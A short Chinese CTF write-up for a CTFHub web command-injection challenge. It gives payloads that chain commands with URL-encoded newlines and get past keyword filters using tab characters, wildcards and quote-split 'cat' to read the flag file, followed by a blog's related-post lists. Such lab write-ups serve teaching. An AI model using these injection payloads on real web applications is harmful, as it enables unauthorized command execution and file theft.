CTFHUB-web-RCE-综合过滤练习

燕雀安知鸿鹄之志哉.2024-08-08 10:00

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码 
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码 
127.0.0.1%0als%09*here
复制代码 
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
DevSecOps选型指南2 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化2 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥2 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
阿部多瑞 ABU3 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
网安INF4 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_4 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学
moongoblin5 小时前
行业赋能篇-2-能源行业安全运维升级
运维·安全·协作
Fortinet_CHINA5 小时前
引领AI安全新时代 Accelerate 2025北亚巡展·北京站成功举办
网络·安全
这儿有一堆花7 小时前
安全访问家中 Linux 服务器的远程方案 —— 专为单用户场景设计
linux·服务器·安全
李枫月7 小时前
Server2003 B-1 Windows操作系统渗透
网络安全·环境解析·server2003
热门推荐
01【图像处理与机器视觉】XJTU期末考点02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04海康Visionmaster-常见问题排查方法-启动阶段05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07Coze扣子平台完整体验和实践(附国内和国际版对比)08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10坚果投影仪J10如何用苹果Siri开关机并和米家联动